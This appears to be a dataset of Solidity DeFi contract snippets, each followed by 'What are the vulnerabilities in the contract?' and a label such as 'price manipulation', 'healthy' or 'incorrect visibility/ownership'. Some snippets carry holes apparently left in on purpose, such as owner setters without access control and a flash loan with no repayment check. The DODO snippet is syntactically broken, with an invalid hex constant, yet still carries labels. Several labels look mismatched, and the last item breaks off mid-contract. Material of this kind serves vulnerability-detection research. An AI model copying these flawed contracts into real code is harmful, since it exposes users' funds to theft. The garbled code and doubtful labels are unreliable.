423 
424     /**
425      * @notice Set guardian for price oracle proxy
426      * @param _guardian The new guardian
427      */
428     function _setGuardian(address _guardian) external {
429         require(msg.sender == admin, "only the admin may set new guardian");
430         guardian = _guardian;
431         emit SetGuardian(guardian);
432     }
433 
434     /**
435      * @notice Set admin for price oracle proxy
436      * @param _admin The new admin
437      */
438     function _setAdmin(address _admin) external {
439         require(msg.sender == admin, "only the admin may set new admin");
440         admin = _admin;
441         emit SetAdmin(admin);
442     }
443 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 contract Example {
2     function flash(
3         address recipient,
4         uint256 amount0,
5         uint256 amount1,
6         bytes calldata data
7     ) external isFlashable globallyTransactable transactable isNotEmergency {
8         uint256 fee = curve.epsilon.mulu(1e18);
9         
10         uint256 fee0 = FullMath.mulDivRoundingUp(amount0, fee, 1e18);
11         uint256 fee1 = FullMath.mulDivRoundingUp(amount1, fee, 1e18);
12 
13         uint256 balance0Before = IERC20(derivatives[0]).balanceOf(address(this));
14         uint256 balance1Before = IERC20(derivatives[1]).balanceOf(address(this));
15 
16         if (amount0 > 0) IERC20(derivatives[0]).safeTransfer(recipient, amount0);
17         if (amount1 > 0) IERC20(derivatives[1]).safeTransfer(recipient, amount1);
18 
19         IFlashCallback(msg.sender).flashCallback(fee0, fee1, data);
20 
21         uint256 balance0After = IERC20(derivatives[0]).balanceOf(address(this));
22         uint256 balance1After = IERC20(derivatives[1]).balanceOf(address(this));
23 
24         // sub is safe because we know balanceAfter is gt balanceBefore by at least fee
25         uint256 paid0 = balance0After - balance0Before;
26         uint256 paid1 = balance1After - balance1Before;
27 
28         IERC20(derivatives[0]).safeTransfer(owner, paid0);        
29         IERC20(derivatives[1]).safeTransfer(owner, paid1);        
30 
31         emit Flash(msg.sender, recipient, amount0, amount1, paid0, paid1);
32     }  
33 }  
What are the vulnerabilities in the contract?
money market
<end of text>
1  contract PoolCurve{
2 
3    /// @notice sets the parameters for the pool
4     /// @param _alpha the value for alpha (halt threshold) must be less than or equal to 1 and greater than 0
5     /// @param _beta the value for beta must be less than alpha and greater than 0
6     /// @param _feeAtHalt the maximum value for the fee at the halt point
7     /// @param _epsilon the base fee for the pool
8     /// @param _lambda the value for lambda must be less than or equal to 1 and greater than zero
9     function setParams(
10         uint256 _alpha,
11         uint256 _beta,
12         uint256 _feeAtHalt,
13         uint256 _epsilon,
14         uint256 _lambda
15     ) external {
16         Orchestrator.setParams(curve, _alpha, _beta, _feeAtHalt, _epsilon, _lambda);
17     }
18 
19     /// @notice excludes an assimilator from the curve
20     /// @param _derivative the address of the assimilator to exclude
21     function excludeDerivative(address _derivative) external {
22         for (uint256 i = 0; i < numeraires.length; i++) {
23             if (_derivative == numeraires[i]) revert("Curve/cannot-delete-numeraire");
24             if (_derivative == reserves[i]) revert("Curve/cannot-delete-reserve");
25         }
26 
27         delete curve.assimilators[_derivative];
28     }
29 
30     function turnOffWhitelisting() external {
31         emit WhitelistingStopped();
32 
33         whitelistingStage = false;
34     }
35 
36     function setEmergency(bool _emergency) external {
37         emit EmergencyAlarm(_emergency);
38 
39         emergency = _emergency;
40     }
41 
42     function setFrozen(bool _toFreezeOrNotToFreeze) external {
43         emit FrozenSet(_toFreezeOrNotToFreeze);
44 
45         frozen = _toFreezeOrNotToFreeze;
46     }
47 
48     function transferOwnership(address _newOwner) external {
49         require(_newOwner != address(0), "Curve/new-owner-cannot-be-zeroth-address");
50 
51         emit OwnershipTransfered(owner, _newOwner);
52 
53         owner = _newOwner;
54     }
55 
56 }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
<end of text>
1  pragma solidity ^0.8.13;
2 pragma experimental ABIEncoderV2;
3 
4 import './interfaces/IFlashCallback.sol';
5 
6 import "../lib/openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol";
7 
8 import "./lib/ABDKMath64x64.sol";
9 
10 import "./lib/FullMath.sol";
11 
12 import "./lib/NoDelegateCall.sol";
13 
14 import "./Orchestrator.sol";
15 
16 import "./ProportionalLiquidity.sol";
17 
18 import "./Swaps.sol";
19 
20 import "./ViewLiquidity.sol";
21 
22 import "./Storage.sol";
23 
24 import "./MerkleProver.sol";
25 
26 import "./interfaces/IFreeFromUpTo.sol";
27 
28 import "./interfaces/ICurveFactory.sol";
29 
30 import "./Structs.sol";
31 
32 library Curves {
33     using ABDKMath64x64 for int128;
34 
35     event Approval(address indexed _owner, address indexed spender, uint256 value);
36     event Transfer(address indexed from, address indexed to, uint256 value);
37 
38     function add(
39         uint256 x,
40         uint256 y,
41         string memory errorMessage
42     ) private pure returns (uint256 z) {
43         require((z = x + y) >= x, errorMessage);
44     }
45 
46     function sub(
47         uint256 x,
48         uint256 y,
49         string memory errorMessage
50     ) private pure returns (uint256 z) {
51         require((z = x - y) <= x, errorMessage);
52     }
53 
54     /**
55      * @dev See {IERC20-transfer}.
56      *
57      * Requirements:
58      *
59      * - `recipient` cannot be the zero address.
60      * - the caller must have a balance of at least `amount`.
61      */
62     function transfer(
63         Storage.Curve storage curve,
64         address recipient,
65         uint256 amount
66     ) external returns (bool) {
67         _transfer(curve, msg.sender, recipient, amount);
68         return true;
69     }
70 
71     /**
72      * @dev See {IERC20-approve}.
73      *
74      * Requirements:
75      *
76      * - `spender` cannot be the zero address.
77      */
78     function approve(
79         Storage.Curve storage curve,
80         address spender,
81         uint256 amount
82     ) external returns (bool) {
83         _approve(curve, msg.sender, spender, amount);
84         return true;
85     }
86 
87     /**
88      * @dev See {IERC20-transferFrom}.
89      *
90      * Emits an {Approval} event indicating the updated allowance. This is not
91      * required by the EIP. See the note at the beginning of {ERC20};
92      *
93      * Requirements:
94      * - `sender` and `recipient` cannot be the zero address.
95      * - `sender` must have a balance of at least `amount`.
96      * - the caller must have allowance for `sender`'s tokens of at least
97      * `amount`
98      */
99     function transferFrom(
100         Storage.Curve storage curve,
101         address sender,
102         address recipient,
103         uint256 amount
104     ) external returns (bool) {
105         _transfer(curve, sender, recipient, amount);
106         _approve(
107             curve,
108             sender,
109             msg.sender,
110             sub(curve.allowances[sender][msg.sender], amount, "Curve/insufficient-allowance")
111         );
112         return true;
113     }
114 
115     /**
116      * @dev Atomically increases the allowance granted to `spender` by the caller.
117      *
118      * This is an alternative to {approve} that can be used as a mitigation for
119      * problems described in {IERC20-approve}.
120      *
121      * Emits an {Approval} event indicating the updated allowance.
122      *
123      * Requirements:
124      *
125      * - `spender` cannot be the zero address.
126      */
127     function increaseAllowance(
128         Storage.Curve storage curve,
129         address spender,
130         uint256 addedValue
131     ) external returns (bool) {
132         _approve(
133             curve,
134             msg.sender,
135             spender,
136             add(curve.allowances[msg.sender][spender], addedValue, "Curve/approval-overflow")
137         );
138         return true;
139     }
140 
141     /**
142      * @dev Atomically decreases the allowance granted to `spender` by the caller.
143      *
144      * This is an alternative to {approve} that can be used as a mitigation for
145      * problems described in {IERC20-approve}.
146      *
147      * Emits an {Approval} event indicating the updated allowance.
148      *
149      * Requirements:
150      *
151      * - `spender` cannot be the zero address.
152      * - `spender` must have allowance for the caller of at least
153      * `subtractedValue`.
154      */
155     function decreaseAllowance(
156         Storage.Curve storage curve,
157         address spender,
158         uint256 subtractedValue
159     ) external returns (bool) {
160         _approve(
161             curve,
162             msg.sender,
163             spender,
164             sub(curve.allowances[msg.sender][spender], subtractedValue, "Curve/allowance-decrease-underflow")
165         );
166         return true;
167     }
168 
169     /**
170      * @dev Moves tokens `amount` from `sender` to `recipient`.
171      *
172      * This is public function is equivalent to {transfer}, and can be used to
173      * e.g. implement automatic token fees, slashing mechanisms, etc.
174      *
175      * Emits a {Transfer} event.
176      *
177      * Requirements:
178      *
179      * - `sender` cannot be the zero address.
180      * - `recipient` cannot be the zero address.
181      * - `sender` must have a balance of at least `amount`.
182      */
183     function _transfer(
184         Storage.Curve storage curve,
185         address sender,
186         address recipient,
187         uint256 amount
188     ) private {
189         require(sender != address(0), "ERC20: transfer from the zero address");
190         require(recipient != address(0), "ERC20: transfer to the zero address");
191 
192         curve.balances[sender] = sub(curve.balances[sender], amount, "Curve/insufficient-balance");
193         curve.balances[recipient] = add(curve.balances[recipient], amount, "Curve/transfer-overflow");
194         emit Transfer(sender, recipient, amount);
195     }
196 
197     /**
198      * @dev Sets `amount` as the allowance of `spender` over the `_owner`s tokens.
199      *
200      * This is public function is equivalent to `approve`, and can be used to
201      * e.g. set automatic allowances for certain subsystems, etc.
202      *
203      * Emits an {Approval} event.
204      *
205      * Requirements:
206      *
207      * - `_owner` cannot be the zero address.
208      * - `spender` cannot be the zero address.
209      */
210     function _approve(
211         Storage.Curve storage curve,
212         address _owner,
213         address spender,
214         uint256 amount
215     ) private {
216         require(_owner != address(0), "ERC20: approve from the zero address");
217         require(spender != address(0), "ERC20: approve to the zero address");
218 
219         curve.allowances[_owner][spender] = amount;
220         emit Approval(_owner, spender, amount);
221     }
222 }
223 
224 contract Curve is Storage, MerkleProver, NoDelegateCall {
225     using SafeMath for uint256;
226     using ABDKMath64x64 for int128;
227     using SafeERC20 for IERC20;
228 
229     address private curveFactory;
230 
231     event Approval(address indexed _owner, address indexed spender, uint256 value);
232 
233     event ParametersSet(uint256 alpha, uint256 beta, uint256 delta, uint256 epsilon, uint256 lambda);
234 
235     event AssetIncluded(address indexed numeraire, address indexed reserve, uint256 weight);
236 
237     event AssimilatorIncluded(
238         address indexed derivative,
239         address indexed numeraire,
240         address indexed reserve,
241         address assimilator
242     );
243 
244     event PartitionRedeemed(address indexed token, address indexed redeemer, uint256 value);
245 
246     event OwnershipTransfered(address indexed previousOwner, address indexed newOwner);
247 
248     event FrozenSet(bool isFrozen);
249 
250     event EmergencyAlarm(bool isEmergency);
251 
252     event WhitelistingStopped();
253 
254     event Trade(
255         address indexed trader,
256         address indexed origin,
257         address indexed target,
258         uint256 originAmount,
259         uint256 targetAmount
260     );
261 
262     event Transfer(address indexed from, address indexed to, uint256 value);
263 
264     event Flash(address indexed from, address indexed to, uint256 value0, uint256 value1, uint256 paid0, uint256 paid1);
265 
266     modifier onlyOwner() {
267         require(msg.sender == owner, "Curve/caller-is-not-owner");
268         _;
269     }
270 
271     modifier nonReentrant() {
272         require(notEntered, "Curve/re-entered");
273         notEntered = false;
274         _;
275         notEntered = true;
276     }
277 
278     modifier transactable() {
279         require(!frozen, "Curve/frozen-only-allowing-proportional-withdraw");
280         _;
281     }
282 
283     modifier isEmergency() {
284         require(emergency, "Curve/emergency-only-allowing-emergency-proportional-withdraw");
285         _;
286     }
287 
288     modifier isNotEmergency() {
289         require(!emergency, "Curve/emergency-only-allowing-emergency-proportional-withdraw");
290         _;
291     }
292 
293     modifier deadline(uint256 _deadline) {
294         require(block.timestamp < _deadline, "Curve/tx-deadline-passed");
295         _;
296     }
297 
298     modifier inWhitelistingStage() {
299         require(whitelistingStage, "Curve/whitelist-stage-stopped");
300         _;
301     }
302 
303     modifier notInWhitelistingStage() {
304         require(!whitelistingStage, "Curve/whitelist-stage-on-going");
305         _;
306     }
307 
308     modifier globallyTransactable() {
309         require(!ICurveFactory(address(curveFactory)).getGlobalFrozenState(), "Curve/frozen-globally-only-allowing-proportional-withdraw");
310         _;
311     }
312     
313     modifier isFlashable() {
314         require(ICurveFactory(address(curveFactory)).getFlashableState(), "Curve/flashloans-paused");
315         _;
316     }
317 
318     constructor(
319         string memory _name,
320         string memory _symbol,
321         address[] memory _assets,
322         uint256[] memory _assetWeights,
323         address _factory
324     ) {
325         owner = msg.sender;
326         name = _name;
327         symbol = _symbol;
328         curveFactory = _factory;
329         emit OwnershipTransfered(address(0), msg.sender);
330 
331         Orchestrator.initialize(curve, numeraires, reserves, derivatives, _assets, _assetWeights);
332     }
333 
334     /// @notice sets the parameters for the pool
335     /// @param _alpha the value for alpha (halt threshold) must be less than or equal to 1 and greater than 0
336     /// @param _beta the value for beta must be less than alpha and greater than 0
337     /// @param _feeAtHalt the maximum value for the fee at the halt point
338     /// @param _epsilon the base fee for the pool
339     /// @param _lambda the value for lambda must be less than or equal to 1 and greater than zero
340     function setParams(
341         uint256 _alpha,
342         uint256 _beta,
343         uint256 _feeAtHalt,
344         uint256 _epsilon,
345         uint256 _lambda
346     ) external onlyOwner {
347         Orchestrator.setParams(curve, _alpha, _beta, _feeAtHalt, _epsilon, _lambda);
348     }
349 
350     /// @notice excludes an assimilator from the curve
351     /// @param _derivative the address of the assimilator to exclude
352     function excludeDerivative(address _derivative) external onlyOwner {
353         for (uint256 i = 0; i < numeraires.length; i++) {
354             if (_derivative == numeraires[i]) revert("Curve/cannot-delete-numeraire");
355             if (_derivative == reserves[i]) revert("Curve/cannot-delete-reserve");
356         }
357 
358         delete curve.assimilators[_derivative];
359     }
360 
361     /// @notice view the current parameters of the curve
362     /// @return alpha_ the current alpha value
363     ///  beta_ the current beta value
364     ///  delta_ the current delta value
365     ///  epsilon_ the current epsilon value
366     ///  lambda_ the current lambda value
367     ///  omega_ the current omega value
368     function viewCurve()
369         external
370         view
371         returns (
372             uint256 alpha_,
373             uint256 beta_,
374             uint256 delta_,
375             uint256 epsilon_,
376             uint256 lambda_
377         )
378     {
379         return Orchestrator.viewCurve(curve);
380     }
381 
382     function turnOffWhitelisting() external onlyOwner {
383         emit WhitelistingStopped();
384 
385         whitelistingStage = false;
386     }
387 
388     function setEmergency(bool _emergency) external onlyOwner {
389         emit EmergencyAlarm(_emergency);
390 
391         emergency = _emergency;
392     }
393 
394     function setFrozen(bool _toFreezeOrNotToFreeze) external onlyOwner {
395         emit FrozenSet(_toFreezeOrNotToFreeze);
396 
397         frozen = _toFreezeOrNotToFreeze;
398     }
399 
400     function transferOwnership(address _newOwner) external onlyOwner {
401         require(_newOwner != address(0), "Curve/new-owner-cannot-be-zeroth-address");
402 
403         emit OwnershipTransfered(owner, _newOwner);
404 
405         owner = _newOwner;
406     }
407 
408     /// @notice swap a dynamic origin amount for a fixed target amount
409     /// @param _origin the address of the origin
410     /// @param _target the address of the target
411     /// @param _originAmount the origin amount
412     /// @param _minTargetAmount the minimum target amount
413     /// @param _deadline deadline in block number after which the trade will not execute
414     /// @return targetAmount_ the amount of target that has been swapped for the origin amount
415     function originSwap(
416         address _origin,
417         address _target,
418         uint256 _originAmount,
419         uint256 _minTargetAmount,
420         uint256 _deadline
421     ) external deadline(_deadline) globallyTransactable transactable noDelegateCall isNotEmergency nonReentrant returns (uint256 targetAmount_) {
422         OriginSwapData memory _swapData;
423         _swapData._origin = _origin;
424         _swapData._target = _target;
425         _swapData._originAmount = _originAmount;
426         _swapData._recipient = msg.sender;
427         _swapData._curveFactory = curveFactory;
428         targetAmount_ = Swaps.originSwap(curve, _swapData);
429         // targetAmount_ = Swaps.originSwap(curve, _origin, _target, _originAmount, msg.sender,curveFactory);
430 
431         require(targetAmount_ >= _minTargetAmount, "Curve/below-min-target-amount");
432     }
433 
434     /// @notice view how much target amount a fixed origin amount will swap for
435     /// @param _origin the address of the origin
436     /// @param _target the address of the target
437     /// @param _originAmount the origin amount
438     /// @return targetAmount_ the target amount that would have been swapped for the origin amount
439     function viewOriginSwap(
440         address _origin,
441         address _target,
442         uint256 _originAmount
443     ) external view globallyTransactable transactable returns (uint256 targetAmount_) {
444         targetAmount_ = Swaps.viewOriginSwap(curve, _origin, _target, _originAmount);
445     }
446 
447     /// @notice swap a dynamic origin amount for a fixed target amount
448     /// @param _origin the address of the origin
449     /// @param _target the address of the target
450     /// @param _maxOriginAmount the maximum origin amount
451     /// @param _targetAmount the target amount
452     /// @param _deadline deadline in block number after which the trade will not execute
453     /// @return originAmount_ the amount of origin that has been swapped for the target
454     function targetSwap(
455         address _origin,
456         address _target,
457         uint256 _maxOriginAmount,
458         uint256 _targetAmount,
459         uint256 _deadline
460     ) external deadline(_deadline) globallyTransactable transactable noDelegateCall isNotEmergency nonReentrant returns (uint256 originAmount_) {
461         TargetSwapData memory _swapData;
462         _swapData._origin = _origin;
463         _swapData._target = _target;
464         _swapData._targetAmount = _targetAmount;
465         _swapData._recipient = msg.sender;
466         _swapData._curveFactory = curveFactory;
467         originAmount_ = Swaps.targetSwap(curve, _swapData);
468         // originAmount_ = Swaps.targetSwap(curve, _origin, _target, _targetAmount, msg.sender,curveFactory);
469 
470         require(originAmount_ <= _maxOriginAmount, "Curve/above-max-origin-amount");
471     }
472 
473     /// @notice view how much of the origin currency the target currency will take
474     /// @param _origin the address of the origin
475     /// @param _target the address of the target
476     /// @param _targetAmount the target amount
477     /// @return originAmount_ the amount of target that has been swapped for the origin
478     function viewTargetSwap(
479         address _origin,
480         address _target,
481         uint256 _targetAmount
482     ) external view globallyTransactable transactable returns (uint256 originAmount_) {
483         originAmount_ = Swaps.viewTargetSwap(curve, _origin, _target, _targetAmount);
484     }
485 
486     /// @notice deposit into the pool with no slippage from the numeraire assets the pool supports
487     /// @param  index Index corresponding to the merkleProof
488     /// @param  account Address coorresponding to the merkleProof
489     /// @param  amount Amount coorresponding to the merkleProof, should always be 1
490     /// @param  merkleProof Merkle proof
491     /// @param  _deposit the full amount you want to deposit into the pool which will be divided up evenly amongst
492     ///                  the numeraire assets of the pool
493     /// @return (the amount of curves you receive in return for your deposit,
494     ///          the amount deposited for each numeraire)
495     function depositWithWhitelist(
496         uint256 index,
497         address account,
498         uint256 amount,
499         bytes32[] calldata merkleProof,
500         uint256 _deposit,
501         uint256 _deadline
502     ) external deadline(_deadline) globallyTransactable transactable nonReentrant noDelegateCall inWhitelistingStage returns (uint256, uint256[] memory) {
503         require(amount == 1, "Curve/invalid-amount");
504         require(index <= 473, "Curve/index-out-of-range" );
505         require(isWhitelisted(index, account, amount, merkleProof), "Curve/not-whitelisted");
506         require(msg.sender == account, "Curve/not-approved-user");
507 
508         (uint256 curvesMinted_, uint256[] memory deposits_) =
509             ProportionalLiquidity.proportionalDeposit(curve, _deposit);
510 
511         whitelistedDeposited[msg.sender] = whitelistedDeposited[msg.sender].add(curvesMinted_);
512 
513         // 10k max deposit
514         if (whitelistedDeposited[msg.sender] > 10000e18) {
515             revert("Curve/exceed-whitelist-maximum-deposit");
516         }
517 
518         return (curvesMinted_, deposits_);
519     }
520 
521     /// @notice deposit into the pool with no slippage from the numeraire assets the pool supports
522     /// @param  _deposit the full amount you want to deposit into the pool which will be divided up evenly amongst
523     ///                  the numeraire assets of the pool
524     /// @return (the amount of curves you receive in return for your deposit,
525     ///          the amount deposited for each numeraire)
526     function deposit(uint256 _deposit, uint256 _deadline)
527         external
528         deadline(_deadline)
529         globallyTransactable
530         transactable
531         nonReentrant
532         noDelegateCall
533         notInWhitelistingStage
534         isNotEmergency
535         returns (uint256, uint256[] memory)
536     {
537         // (curvesMinted_,  deposits_)
538         return ProportionalLiquidity.proportionalDeposit(curve, _deposit);
539     }
540 
541     /// @notice view deposits and curves minted a given deposit would return
542     /// @param _deposit the full amount of stablecoins you want to deposit. Divided evenly according to the
543     ///                 prevailing proportions of the numeraire assets of the pool
544     /// @return (the amount of curves you receive in return for your deposit,
545     ///          the amount deposited for each numeraire)
546     function viewDeposit(uint256 _deposit) external view globallyTransactable transactable returns (uint256, uint256[] memory) {
547         // curvesToMint_, depositsToMake_
548         return ProportionalLiquidity.viewProportionalDeposit(curve, _deposit);
549     }
550 
551     /// @notice  Emergency withdraw tokens in the event that the oracle somehow bugs out
552     ///          and no one is able to withdraw due to the invariant check
553     /// @param   _curvesToBurn the full amount you want to withdraw from the pool which will be withdrawn from evenly amongst the
554     ///                        numeraire assets of the pool
555     /// @return withdrawals_ the amonts of numeraire assets withdrawn from the pool
556     function emergencyWithdraw(uint256 _curvesToBurn, uint256 _deadline)
557         external
558         isEmergency
559         deadline(_deadline)
560         nonReentrant
561         noDelegateCall
562         returns (uint256[] memory withdrawals_)
563     {
564         return ProportionalLiquidity.proportionalWithdraw(curve, _curvesToBurn);
565     }
566 
567     /// @notice  withdrawas amount of curve tokens from the the pool equally from the numeraire assets of the pool with no slippage
568     /// @param   _curvesToBurn the full amount you want to withdraw from the pool which will be withdrawn from evenly amongst the
569     ///                        numeraire assets of the pool
570     /// @return withdrawals_ the amonts of numeraire assets withdrawn from the pool
571     function withdraw(uint256 _curvesToBurn, uint256 _deadline)
572         external
573         deadline(_deadline)
574         nonReentrant
575         noDelegateCall
576         isNotEmergency
577         returns (uint256[] memory withdrawals_)
578     {
579         if (whitelistingStage) {
580             whitelistedDeposited[msg.sender] = whitelistedDeposited[msg.sender].sub(_curvesToBurn);
581         }
582 
583         return ProportionalLiquidity.proportionalWithdraw(curve, _curvesToBurn);
584     }
585 
586     /// @notice  views the withdrawal information from the pool
587     /// @param   _curvesToBurn the full amount you want to withdraw from the pool which will be withdrawn from evenly amongst the
588     ///                        numeraire assets of the pool
589     /// @return the amonnts of numeraire assets withdrawn from the pool
590     function viewWithdraw(uint256 _curvesToBurn) external view globallyTransactable transactable returns (uint256[] memory) {
591         return ProportionalLiquidity.viewProportionalWithdraw(curve, _curvesToBurn);
592     }
593 
594     function supportsInterface(bytes4 _interface) public pure returns (bool supports_) {
595         supports_ =
596             this.supportsInterface.selector == _interface || // erc165
597             bytes4(0x7f5828d0) == _interface || // eip173
598             bytes4(0x36372b07) == _interface; // erc20
599     }
600 
601     /// @notice transfers curve tokens
602     /// @param _recipient the address of where to send the curve tokens
603     /// @param _amount the amount of curve tokens to send
604     /// @return success_ the success bool of the call
605     function transfer(address _recipient, uint256 _amount) public nonReentrant noDelegateCall isNotEmergency returns (bool success_) {
606         success_ = Curves.transfer(curve, _recipient, _amount);
607     }
608 
609     /// @notice transfers curve tokens from one address to another address
610     /// @param _sender the account from which the curve tokens will be sent
611     /// @param _recipient the account to which the curve tokens will be sent
612     /// @param _amount the amount of curve tokens to transfer
613     /// @return success_ the success bool of the call
614     function transferFrom(
615         address _sender,
616         address _recipient,
617         uint256 _amount
618     ) public nonReentrant noDelegateCall isNotEmergency returns (bool success_) {
619         success_ = Curves.transferFrom(curve, _sender, _recipient, _amount);
620     }
621 
622     /// @notice approves a user to spend curve tokens on their behalf
623     /// @param _spender the account to allow to spend from msg.sender
624     /// @param _amount the amount to specify the spender can spend
625     /// @return success_ the success bool of this call
626     function approve(address _spender, uint256 _amount) public nonReentrant noDelegateCall returns (bool success_) {
627         success_ = Curves.approve(curve, _spender, _amount);
628     }
629     
630     function flash(
631         address recipient,
632         uint256 amount0,
633         uint256 amount1,
634         bytes calldata data
635     ) external isFlashable globallyTransactable nonReentrant noDelegateCall transactable isNotEmergency {
636         uint256 fee = curve.epsilon.mulu(1e18);
637 
638         require(IERC20(derivatives[0]).balanceOf(address(this)) > 0, 'Curve/token0-zero-liquidity-depth');
639         require(IERC20(derivatives[1]).balanceOf(address(this)) > 0, 'Curve/token1-zero-liquidity-depth');
640         
641         uint256 fee0 = FullMath.mulDivRoundingUp(amount0, fee, 1e18);
642         uint256 fee1 = FullMath.mulDivRoundingUp(amount1, fee, 1e18);
643 
644         uint256 balance0Before = IERC20(derivatives[0]).balanceOf(address(this));
645         uint256 balance1Before = IERC20(derivatives[1]).balanceOf(address(this));
646 
647         if (amount0 > 0) IERC20(derivatives[0]).safeTransfer(recipient, amount0);
648         if (amount1 > 0) IERC20(derivatives[1]).safeTransfer(recipient, amount1);
649 
650         IFlashCallback(msg.sender).flashCallback(fee0, fee1, data);
651 
652         uint256 balance0After = IERC20(derivatives[0]).balanceOf(address(this));
653         uint256 balance1After = IERC20(derivatives[1]).balanceOf(address(this));
654 
655         require(balance0Before.add(fee0) <= balance0After, 'Curve/insufficient-token0-returned');
656         require(balance1Before.add(fee1) <= balance1After, 'Curve/insufficient-token1-returned');
657 
658         // sub is safe because we know balanceAfter is gt balanceBefore by at least fee
659         uint256 paid0 = balance0After - balance0Before;
660         uint256 paid1 = balance1After - balance1Before;
661 
662         IERC20(derivatives[0]).safeTransfer(owner, paid0);        
663         IERC20(derivatives[1]).safeTransfer(owner, paid1);        
664 
665         emit Flash(msg.sender, recipient, amount0, amount1, paid0, paid1);
666     }    
667 
668     /// @notice view the curve token balance of a given account
669     /// @param _account the account to view the balance of
670     /// @return balance_ the curve token ballance of the given account
671     function balanceOf(address _account) public view returns (uint256 balance_) {
672         balance_ = curve.balances[_account];
673     }
674 
675     /// @notice views the total curve supply of the pool
676     /// @return totalSupply_ the total supply of curve tokens
677     function totalSupply() public view returns (uint256 totalSupply_) {
678         totalSupply_ = curve.totalSupply;
679     }
680 
681     /// @notice views the total allowance one address has to spend from another address
682     /// @param _owner the address of the owner
683     /// @param _spender the address of the spender
684     /// @return allowance_ the amount the owner has allotted the spender
685     function allowance(address _owner, address _spender) public view returns (uint256 allowance_) {
686         allowance_ = curve.allowances[_owner][_spender];
687     }
688 
689     /// @notice views the total amount of liquidity in the curve in numeraire value and format - 18 decimals
690     /// @return total_ the total value in the curve
691     /// @return individual_ the individual values in the curve
692     function liquidity() public view returns (uint256 total_, uint256[] memory individual_) {
693         return ViewLiquidity.viewLiquidity(curve);
694     }
695 
696     /// @notice view the assimilator address for a derivative
697     /// @return assimilator_ the assimilator address
698     function assimilator(address _derivative) public view returns (address assimilator_) {
699         assimilator_ = curve.assimilators[_derivative].addr;
700     }
701 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 contract DODO {
2     function init(
3         address maintainer,
4         address baseTokenAddress,
5         address quoteTokenAddress,
6         uint256 lpFeeRate,
7         uint256 mtFeeRate,
8         uint256 k,
9         uint256 i,
10         bool isOpenTWAP
11     ) external {
12         require(baseTokenAddress != quoteTokenAddress, "BASE_QUOTE_CAN_NOT_BE_SAME");
13         _BASE_TOKEN_ = IERC20(baseTokenAddress);
14         _QUOTE_TOKEN_ = IERC20(quoteTokenAddress);
15         
16         require(i > 0 && i <= 10**36); 
17         _I_ = i; 
18        
19         require(k <= 10**18); 
20         _K_ = k; 
21        
22         _LP_FEE_RATE_ = lpFeeRate; 
23         _MT_FEE_RATE_MODEL_ = IFeeRateModel(mtFeeRate); 
24         _MAINTAINER_ = maintainer; 
25         
26         _IS_OPEN_TWAP_ = isOpenTWAP; 
27         if(isOpenTWAP) _BLOCK_TIMESTAMP_LAST_ = uint32(block.timestamp % 2**32); 
28         
29         string memory connect = "_"; 
30         string memory suffix = "DLP"; 
31 
32         name = string(abi.encodePacked(suffix, connect, addressToShortString(address(this)))); 
33         symbol = "DLP"; 
34         decimals = _BASE_TOKEN_.decimals(); 
35         
36         uint256 chainId; 
37         assembly{
38             chainId := chainid()
39         }
40         abi.encode(
41         0x8b73x3x69bb8fe3e512ecc4cf759cc79239fb179b0ffacaa9a75d522b39400f, 
42         keccak256(name)), 
43         keccak256("I")),
44         chainId, 
45         address(this)
46         )
47  }; 
48 }
What are the vulnerabilities in the contract?
reeentrancy
price manipulation
business logic flaw
<end of text>
1 pragma solidity 0.6.9;
2 pragma experimental ABIEncoderV2;
3 
4 import {Types} from "./lib/Types.sol";
5 import {IERC20} from "./intf/IERC20.sol";
6 import {Storage} from "./impl/Storage.sol";
7 import {Trader} from "./impl/Trader.sol";
8 import {LiquidityProvider} from "./impl/LiquidityProvider.sol";
9 import {Admin} from "./impl/Admin.sol";
10 import {DODOLpToken} from "./impl/DODOLpToken.sol";
11 
12 
13 /**
14  * @title DODO
15  * @author DODO Breeder
16  *
17  * @notice Entrance for users
18  */
19 contract DODO is Admin, Trader, LiquidityProvider {
20     function init(
21         address owner,
22         address supervisor,
23         address maintainer,
24         address baseToken,
25         address quoteToken,
26         address oracle,
27         uint256 lpFeeRate,
28         uint256 mtFeeRate,
29         uint256 k,
30         uint256 gasPriceLimit
31     ) external {
32         require(!_INITIALIZED_, "DODO_INITIALIZED");
33         _INITIALIZED_ = true;
34 
35         // constructor
36         _OWNER_ = owner;
37         emit OwnershipTransferred(address(0), _OWNER_);
38 
39         _SUPERVISOR_ = supervisor;
40         _MAINTAINER_ = maintainer;
41         _BASE_TOKEN_ = baseToken;
42         _QUOTE_TOKEN_ = quoteToken;
43         _ORACLE_ = oracle;
44 
45         _DEPOSIT_BASE_ALLOWED_ = false;
46         _DEPOSIT_QUOTE_ALLOWED_ = false;
47         _TRADE_ALLOWED_ = false;
48         _GAS_PRICE_LIMIT_ = gasPriceLimit;
49 
50         // Advanced controls are disabled by default
51         _BUYING_ALLOWED_ = true;
52         _SELLING_ALLOWED_ = true;
53         uint256 MAX_INT = 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff;
54         _BASE_BALANCE_LIMIT_ = MAX_INT;
55         _QUOTE_BALANCE_LIMIT_ = MAX_INT;
56 
57         _LP_FEE_RATE_ = lpFeeRate;
58         _MT_FEE_RATE_ = mtFeeRate;
59         _K_ = k;
60         _R_STATUS_ = Types.RStatus.ONE;
61 
62         _BASE_CAPITAL_TOKEN_ = address(new DODOLpToken(_BASE_TOKEN_));
63         _QUOTE_CAPITAL_TOKEN_ = address(new DODOLpToken(_QUOTE_TOKEN_));
64 
65         _checkDODOParameters();
66     }
67 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity ^0.6.0;
2 pragma experimental ABIEncoderV2;

3 import "./BondingCurve.sol";
4 import "../pcv/IPCVDeposit.sol";

5 /// @title a square root growth bonding curve for purchasing FEI with ETH
6 /// @author Fei Protocol
7 contract EthBondingCurve is BondingCurve {
8     // solhint-disable-next-line var-name-mixedcase
9     uint256 internal immutable SHIFT; // k shift

10     constructor(
11         uint256 scale,
12         address core,
13         address[] memory pcvDeposits,
14         uint256[] memory ratios,
15         address oracle,
16         uint256 duration,
17         uint256 incentive
18     )
19         public
20         BondingCurve(
21             scale,
22             core,
23             pcvDeposits,
24             ratios,
25             oracle,
26             duration,
27             incentive
28         )
29     {
30         SHIFT = scale / 3; // Enforces a .50c starting price per bonding curve formula
31     }

32     /// @notice purchase FEI for underlying tokens
33     /// @param to address to receive FEI
